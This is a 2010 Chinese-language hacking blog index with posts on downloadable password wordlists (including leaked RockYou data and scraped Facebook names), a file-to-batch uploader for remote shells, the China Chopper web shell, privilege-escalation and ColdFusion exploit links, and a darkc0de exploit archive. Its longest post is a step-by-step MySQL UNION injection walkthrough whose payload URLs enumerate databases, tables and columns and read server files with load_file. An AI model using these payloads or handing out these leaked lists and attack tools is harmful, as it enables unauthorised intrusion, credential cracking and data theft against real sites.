Web安全手册

Compilation of wordlist downloads

root@pcsec.org (Trace) — Tue, 31 Aug 2010 12:55:47 +0800

Original Source: http://www.whatsmypass.com/compilation-of-wordlist-downloads
Props to hashcrack.blogspot.com for compiling the most comprehensive wordlist downloads on the web. Copying links here just in case blogspot ever blows up. Additionally head over to skullsecurity.org they have some specialized wordlists from various sources including the hacked RockYou database and a skim of Facebook names/usernames for a total of 14,488,929 distinct passwords to be exact, collected from 32,943,045 users.

HashKiller
InsidePro
APassCracker
Openwall
ftp.ox.ac.uk
GDataOnline
Cerias.Purdue
Outpost9
VulnerabilityAssessment
PacketStormSecurity
ai.uga.edu-moby
cotse1
cotse2
VXChaos
Wikipedia-wordlist-Sraveau
CrackLib-words
SkullSecurity
Rapidshare-Wordlist.rar
Packetstorm_dic_john_1337
Megaupload-birthdates.rar
Megaupload-default-001.rar
Megaupload-BIG-WPA-LIST-1.rar
Megaupload-BIG-WPA-LIST-2.rar
Megaupload-BIG-WPA-LIST-3.rar
WPA-PSK-WORDLIST-40-MB-rar
WPA-PSK-WORDLIST-2-107-MB-rar
Article7
Rapidshare-Bender-ILLIST
Milw0rm
Rohitab
DualisaNoob
Naxxatoe-dict-total-new-unsorted
DiabloHorn-wordlists-sorted
Bright-Shadows
MIT.edu/~ecprice
NeutronSite
ArtofHacking
CS.Princeton
Spacebar
textfiles-suzybatari2
labs.mininova-wordmatch
BellSouthpwp
Doz.org.uk
ics.uci.edu/~kay
inf.unideb.hu/~jeszy
openDS
sslmit.unibo.it/~dsmiraglio
informatik.uni-leipzig-vn_words.zip
cis.hut.fi
Wordlist.sf.cz
john.cs.olemiss.edu/~sbs
Void.Cyberpunk
CoyoteCult
aima.eecs.berkeley.edu
andre.facadecomputer
aurora.rg.iupui.edu/~schadow
cs.bilkent.edu.tr/~ccelik
broncgeeks.billings.k12.mt.us/vlong
IHTeam
Leetupload-Word Lists
Offensive-Security WPA Rainbow Tables Password List
depositfiles/1z1ipsqi3
MD5Decrypter/Passwords
depositfiles/qdcs7nv7x
ftp.fu-berlin.de
Rapidshare.com/Wordlist.rar
Rapidshare.com/Password.zip
Megaupload/V0X4Y9NE
Megaupload/0UAUNNGT
Megaupload/1UA8QMCN
md5.Hamaney/happybirthdaytoeq.txt
sites.Google.com/ReusableSec
Megaupload.com/SNK18CU0
Hotfile.com/Wordlists-20031009-iso.zip
Rapidshare.com/Wordlist_do_h4tinho.zip
Rapidshare.com/pass50.rar
sweon.net/wordlists
Skullsecurity.org/fbdata.torrent

Leetupload.com/WordLists
Passwords: to0l-base, zmetex, mrdel2000

Rapidshare.com/BIG_PASSWORD_LIST.rar
Pass:bodyslamer@warezshares.com

Rapidshare.com/dictionaries-vince213333.part01.rar
Rapidshare.com/dictionaries-vince213333.part02.rar
Rapidshare.com/dictionaries-vince213333.part03.rar

Rapidshare.com/Wordlist_Compilation.part1.rar
Rapidshare.com/Wordlist_Compilation.part2.rar
Rapidshare.com/Wordlist_Compilation.part3.rar
Rapidshare.com/Wordlist_Compilation.part4.rar

Rapidshare.com-word.lst.s.u.john.s.u.200.part01.rar
Rapidshare.com-word.lst.s.u.john.s.u.200.part02.rar
Rapidshare.com-word.lst.s.u.john.s.u.200.part03.rar

Rapidshare-Purehates_word_list.part1.rar
Rapidshare-Purehates_word_list.part2.rar
Rapidshare-Purehates_word_list.part3.rar
Rapidshare-Purehates_word_list.part4.rar
Rapidshare-Purehates_word_list.part5.rar

Rapidshare-_Xploitz_-_Master_Password_Collection.part1.rar
Rapidshare-_Xploitz_-_Master_Password_Collection.part2.rar
Rapidshare-_Xploitz_-_Master_Password_Collection.part3.rar
Rapidshare-_Xploitz_-_Master_Password_Collection.part4.rar
Rapidshare-_Xploitz_-_Master_Password_Collection.part5.rarr
Rapidshare-_Xploitz_-_Master_Password_Collection.part6.rarr
Rapidshare-_Xploitz_-_Master_Password_Collection.part7.rar
Pass: http://forums.remote-exploit.org/

Rapidshare-_Xploitz_-_PASSWORD_DVD.part01.rar
Rapidshare-_Xploitz_-_PASSWORD_DVD.part02.rar
Rapidshare-_Xploitz_-_PASSWORD_DVD.part03.rar
Rapidshare-_Xploitz_-_PASSWORD_DVD.part04.rar
Rapidshare-_Xploitz_-_PASSWORD_DVD.part05.rar
Rapidshare-_Xploitz_-_PASSWORD_DVD.part06.rar
Rapidshare-_Xploitz_-_PASSWORD_DVD.part07.rar
Pass: http://forums.remote-exploit.org/

继续阅读《Compilation of wordlist downloads》的全文内容...

分类: Download | Tags: wordlist wordlists Password dictionary | 添加评论(2)

fuzzdb 1.07 (2010-4-30 1:10:26)
Password / Word lists (2009-9-20 13:5:59)
Database Password Hashes Cracking (2009-4-6 16:20:56)
The Associative Word List Generator (AWLG) - Create Related Wordlists for Password Cracking (2009-1-16 20:35:41)
Oracle Password Cracker (2008-10-1 21:55:25)

新版Any2Bat.vbs

root@pcsec.org (Trace) — Tue, 31 Aug 2010 04:10:11 +0800

Author: zzzEVAzzz

很久以前写过一个Any2Bat，作用是把任何文件变成echo版，以便通过远程shell上传。
http://hi.baidu.com/zzzevazzz/blog/item/75b8b50a118b6c1e94ca6b36.html

新版本改进如下：
1，增加数据压缩功能（使用系统自带的makecab.exe和expand.exe）。
2，Base64编码采用Microsoft.XMLDOM，速度快，代码更简洁。
3，echo生成临时脚本时文件名不带后缀，避免杀毒软件频繁扫描，提高效率。

代码被服务器上的杀软kill了，没法贴，请移步zzzEVAzzz大锅博客观赏。
用法不变。以文件名为参数，或拖放文件到Any2Bat.vbs的图标上。
文件大小以生成的bat不超过500K为宜。

继续阅读《新版Any2Bat.vbs》的全文内容...

分类: Download | Tags: any2bat VbScript zzzEVAzzz | 添加评论(0)

IGUJV - Infection Guide Using Java/VbScript (2008-12-13 16:47:36)

Adobe ColdFusion Directory Traversal Vulnerability

root@pcsec.org (Trace) — Sat, 14 Aug 2010 21:21:55 +0800

#Trace: 用Adobe ColdFusion的不少.

http://www.exploit-db.com/exploits/14641/

进了后台利用方法:
[1] http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
[2] ColdFusion后台利用方法.pdf By Mickey

继续阅读《Adobe ColdFusion Directory Traversal Vulnerability》的全文内容...

分类: Web apps | Tags: ColdFusion Directory Traversal Vulnerability Directory Traversal | 添加评论(3)

More on ColdFusion hacks (2009-7-5 23:22:6)

Black Hat 2010 Token Kidnapping's Revenge

root@pcsec.org (Trace) — Fri, 06 Aug 2010 12:28:50 +0800

#Trace: 提权大杀器,上个月就看到新闻。作者在black hat大会之后把代码公布了。

Source: https://media.blackhat.com/bh-us-10/source/Cerrudo/Source.zip

PDF:
[1] https://media.blackhat.com/bh-us-10/whitepapers/Cerrudo/BlackHat-USA-2010-Cerrudo-Toke-Kidnapping%27s-Revenge-wp.pdf
[2] https://media.blackhat.com/bh-us-10/presentations/Cerrudo/BlackHat-USA-2010-Cerrudo-Toke-Kidnapping%27s-Revenge-slides.pdf

This new presentation will detail new design mistakes and security issues that can be exploited to elevate privileges on all Windows versions including the brand new Windows 2008 R2 and Windows 7. These new attacks allow to bypass new Windows services protections such as Per service SID, Write restricted token, etc. It will be demonstrated that almost any process with impersonation rights can elevate privileges to Local System account and completely compromise Windows OSs. While the issues are not critical in nature since impersonation rights are required, they allow to exploit services such as IIS 6, IIS 7, SQL Server, etc. in some specific scenarios. Exploits code for those services will be released. The presentation will be given in a very practical way showing how the new issues were found, with what tools, techniques, etc. allowing the participants to learn how to easily find these kind security issues in Windows operating systems.

http://www.blackhat.com/html/bh-us-10/bh-us-10-archives.html

NP编译的：http://pcsec.googlecode.com/files/pr.rar

继续阅读《Black Hat 2010 Token Kidnapping's Revenge》的全文内容...

分类: Privilege escalation | Tags: Token Kidnapping Privilege Escalation Black Hat | 添加评论(6)

Windows NT User Mode to Ring 0 Escalation Vulnerability (2010-1-20 20:23:44)
Black Hat USA 2009 Speaker Materials - Updated (2009-7-31 13:0:24)
Black Hat USA 2008 Archives (2009-4-1 2:28:24)
Multiple Kaspersky Products 'klim5.sys' Local Privilege Escalation Vulnerability (2009-2-13 3:5:57)
Php168 v2008 权限提升漏洞 (2009-1-25 15:25:19)

darkc0de.com Archive

root@pcsec.org (Trace) — Mon, 19 Jul 2010 21:09:29 +0800

From http://exploit.co.il/hacking/darkc0decom-archive/

Recently i noticed that darkc0de.com is down

darkc0de.com was a security and hacking related website which contained a large archive of python (and other scripting languages) scripts,exploit and tutorials.

It was a great resource for learning and getting custom made tools

For those of you who didn’t got the chance to download its content I attached most of the tools in a single 150 megs tar.gz file.

the file includes the following site sections:

bruteforce, c0de, cheatsheets, encryption, exploits, ircbots, misc, others, scanners and tutorials

Get it at Megaupload:

Darkc0de.com Archive Download

Get it at Rapidshare:

Darkc0de.com Archive Mirror

继续阅读《darkc0de.com Archive》的全文内容...

分类: Download | Tags: darkc0de | 添加评论(2)

还没有相关文章，您来说两句？

China Chopper @ 20100629

root@pcsec.org (Trace) — Tue, 29 Jun 2010 07:13:39 +0800

菜刀最新版20100629
Asp.Net数据库操作更完善，原来连接会超时这次可以再体验一下！
扫描模块更新、浏览器右键加入本IP网页搜索功能、反IDS的加强、其它...

http://www.maicaidao.com

继续阅读《China Chopper @ 20100629》的全文内容...

分类: Download | Tags: China Chopper 中国菜刀 | 添加评论(0)

还没有相关文章，您来说两句？

Reliable Weekly Exploit Database Updates

root@pcsec.org (Trace) — Mon, 28 Jun 2010 23:39:12 +0800

exploit-db has finally got around to syncing our exploits archive and SVN server. Both the downloadable archive and SVN server will be updated once a week. The date of the last sync can be found at the top right of our site header. You can check out the latest exploit entries using the following command:

svn co svn://www.exploit-db.com/exploitdb exploitdb

More detail Please visit http://www.exploit-db.com/news/

继续阅读《Reliable Weekly Exploit Database Updates》的全文内容...

分类: Download | Tags: Exploit-db Offensive Security | 添加评论(0)

WinScanX - A free Windows enumeration tool and a must have for any security professional (2009-12-23 9:7:10)
Microsoft Security Assessment Tool - Free for Windows (2008-11-18 22:52:50)
JavaScript tutorial - Security (2008-8-21 10:31:41)

[update]John the Ripper & hydra

root@pcsec.org (Trace) — Tue, 15 Jun 2010 02:54:50 +0800

谁共享一下自己的john.pot啊。

John the Ripper 1.7.6 Released
http://www.openwall.com/john/

Hydra 5.7 Released
http://freeworld.thc.org/thc-hydra/

新版本的john对phpass-md5的破解速度提高了不少。

Computer:
    AMD Athlon(tm) 64 X2
    Dual-Core Processor TK-57
    1.90 GHz,899 MB of RAM
    Physical Address Extension

E:\nix\john-1.7.5\run>john --test --format=phpass-md5
Benchmarking: PHPass MD5 [phpass-md5]... Using phpass mode, by linking to md5_gen(17) functions DONE
Many salts:     1241 c/s
Only one salt: 1250 c/s

E:\nix\john-1.7.6\run>john --test --format=phpass-md5
Benchmarking: PHPass MD5 SSE2 [phpass-MD5 SSE2]... Using phpass mode, by linking to md5_gen(17) functions DONE
Many salts:     3008 c/s
Only one salt: 3002 c/s

继续阅读《[update]John the Ripper & hydra》的全文内容...

分类: Download | Tags: john john the ripper hydra | 添加评论(3)

还没有相关文章，您来说两句？

MYSQL高级注入实例

root@pcsec.org (Trace) — Mon, 14 Jun 2010 03:16:16 +0800

感谢xnquan的投递

###########################################
#MYSQL高级注入实例
###########################################

-----------------------------------系统信息 -------------------------------------------
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,version(),4,5
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,database(),4,5
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 1,2,user(),4,5

--------------------------------爆数据库的表 -------------------------------------------------
http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 0,1) t order by table_schema desc)t limit 1--       /0x61797363是爆出的数据库aysc（database()）的16进制爆出位置0的表注意从0开始
××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 2,1) t order by table_schema desc)t limit 1--       /爆出位置2的表

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

http://www.vulnsite.com/renwu.php?id=10 and 1=2 union select 0,0,concat(table_name),0,0 from (select * from (select * from information_schema.tables where table_schema=0x61797363 order by table_schema limit 10,1) t order by table_schema desc)t limit 1--       /爆出位置10的表

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

-------------------------------爆出字段 -------------------------------------------------------------
http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(cast(count(*) as char)),0,0 from information_schema.columns   where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 limit 1--     /0x6364625f696d6167657479706573是选择一个表 0x61797363是数据库账户 16进制
//爆出含有多少字段

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 0,1) t order by 1 desc)t limit 1--
//爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 0 位置的字段（必须转换16进制）

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

http://www.vulnsite.com//renwu.php?id=10 and 1=2 union select 0,0,concat(column_name),0,0 from (select * from (select * from information_schema.columns where table_name=0x6364625f696d6167657479706573 and table_schema=0x61797363 order by 1 limit 1,1) t order by 1 desc)t limit 1--

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

//爆出数据库账户 0x61797363 中的表 0x6364625f696d6167657479706573 的 1 位置的字段（必须转换16进制）

-----------------------------爆出数据数据 ----------------------------------------------------------------

联合查询
这个不说了

-----------------------------跨库？得到数据库账户？--------------
参考我的教程 php注入爆数据库账户
http://u.115.com/file/f86e56c2cb

××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××××

-----------------------------读数据文件--------------
/renwu.php?id=10 and 1=2 union select 0,0,concat(load_file(16进制的地址)),0,0 --

Reference:
[1]http://www.ptsecurity.com/download/PT-devteev-FAST-blind-SQL-Injection.pdf

继续阅读《MYSQL高级注入实例》的全文内容...

分类: Dbapp | Tags: sql injection MYSQL xnquan | 添加评论(1)

SFX-SQLi version 1.1.3.22 (2010-4-6 21:47:39)
Exploiting hard filtered SQL Injections (2010-3-19 23:16:44)
webraider (2010-2-27 19:43:34)
Dirty Tricks (2010-1-25 16:25:54)
睛天电影系统注入漏洞 (2010-1-25 1:47:1)

Penetration Testing In The Real World

root@pcsec.org (Trace) — Fri, 30 Apr 2010 01:17:15 +0800

#Trace:Offensive Security 的教程

Penetration Testing in the real world. If you are tired of “Hacking with Netcat” webcasts or “Penetration Testing with RPC DCOM”, then this movie is for you. It’s a quick reconstruction of a Penetration test we preformed over a year ago, replicated in our labs. We hope you enjoy it! Check it out here :

Penetration Testing in the Real World from Offensive Security on Vimeo.

继续阅读《Penetration Testing In The Real World》的全文内容...

分类: Penetration Testing | Tags: Penetration Testing pentest | 添加评论(0)

Penetration Testing Framework v0.57 released (2009-12-31 19:24:0)
The Art of Grey-Box Attack (2009-7-11 19:16:22)
Remote CMD With WMI[2009-6-26 更新，请下载新版本覆盖。] (2009-6-25 18:11:42)
Plurk蠕蟲、Twitter蠕蟲、MySpace蠕蟲與911於管理面之啟示：滲透測試的新觀念，讓軟體重生吧！ (2009-5-11 13:51:34)
Metasploit3 Postgres On Windows (2009-3-26 17:28:46)

Web安全手册

Compilation of wordlist downloads

相关文章:

新版Any2Bat.vbs

相关文章:

Adobe ColdFusion Directory Traversal Vulnerability

相关文章:

Black Hat 2010 Token Kidnapping's Revenge

相关文章:

darkc0de.com Archive

China Chopper @ 20100629

Reliable Weekly Exploit Database Updates

相关文章:

[update]John the Ripper & hydra

MYSQL高级注入实例

相关文章:

Penetration Testing In The Real World

相关文章: